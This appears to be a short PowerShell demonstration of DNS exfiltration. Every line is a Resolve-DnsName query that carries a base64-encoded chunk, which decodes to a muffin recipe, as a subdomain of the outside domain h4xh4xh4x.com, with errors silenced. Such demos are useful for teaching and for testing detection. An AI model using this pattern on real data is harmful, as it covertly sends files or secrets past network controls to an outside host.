#mypieceofdata.server1.example.com
#Shout out to Chris MacKinnon for taking the initiative to put this demo together.

Resolve-DnsName U2VydmluZyBTaXplICA6IDYgCgogIEFtb3VudCAgTWVhc3VyZSAg.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName ICAgICBJbmdyZWRpZW50IAotLS0tLS0tLSAgLS0tLS0tLS0tLS0t.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName ICAtLS0tLS0tLS0tLQogICAxICAgICAgICAgICAgICAgICAgZWdnCiA.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName gIDMvNCAgY3VwICAgICAgICAgICBtaWxrCiAgIDEvMiAgY3VwICAgICAgIC.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName AgICB2ZWdldGFibGUgb2lsCiAgIDIgICAgY3VwcyAgICAgICAgICBhbGwtcHVycG.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName 9zZSBmbG91cgogICAxLzMgIGN1cCAgICAgICAgICAgc3VnYXIKICAgMyAgICB0ZW.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName FzcG9vbnMgICAgIGJha2luZyBwb3dkZXIKICAgMSAgICB0ZWFzcG9vbiAgICA.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName gIHNhbHQKCkhlYXQgb3ZlbiB0byA0MDAgRi4gR3JlYXNlIGJvdHRvbXMgb25.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName seSBvZiBhYm91dCAxMiBtZWRpdW0gbXVmZmluIGN1cHMsIDIgCjEvMiB4I.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName DEgMS80IGluY2hlcy4gQmVhdCBlZ2cgc3RpciBpbiBtaWxrIGFuZCBvaWwuI.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName FN0aXIgaW4gcmVtYWluaW5nIAppbmdyZWRpZW50cyBhbGwgYXQgb25jZSBqdXN0.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName IHVudGlsIGZsb3VyIGlzIG1vaXN0ZW5lZCAoYmF0dGVyIHdpbGwgYmUgCmx1bXB5KS4gR.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName mlsbCBtdWZmaW4gY3VwcyBhYm91dCAzLzQgZnVsbC4gQmFrZSB1bnRpbCBnb2xkZW4g.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName YnJvd24sIGFib3V0IAoyMCBtaW51dGVzLiBJbW1lZGlhdGVseSByZW1vdmUgZnJ.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName vbSBwYW4uIEFib3V0IDEgZG96ZW4gbXVmZmlucy4KCkJsdWViZXJyeSBtdWZmaW5z.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName OiBTdGlyIGluIDEgY3VwIGZyZXNoIG9yIDMvNCBjdXAgZnJvemVuIGJsdWViZXJ.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName yaWVzIAoodGhhd2VkIGFuZCB3ZWxsIGRyYWluZWQpIHdpdGggdGhlIG1pbGsuCgpPY.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName XRtZWFsLVJhaXNpbiBtdWZmaW5zOiBTdGlyIGluIDEgY3VwIHJhaXNpbnMgd2l0a.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName CB0aGUgbWlsay4gIERlY3JlYXNlIApmbG91ciB0byAxIGN1cDsgc3RpciBp.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName biAxIGN1cCBxdWljay1jb29raW5nIG9hdHMsIDEvMiB0ZWFzcG9vbiBnc.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
Resolve-DnsName m91bmQgCm51dG1lZyBhbmQgMS80IHRlYXNwb29uIGdyb3VuZCBjaW5uYW1vbiB3aXRoIHRoZSBmbG91ci4=.h4xh4xh4x.com -ErrorAction SilentlyContinue -QuickTimeout
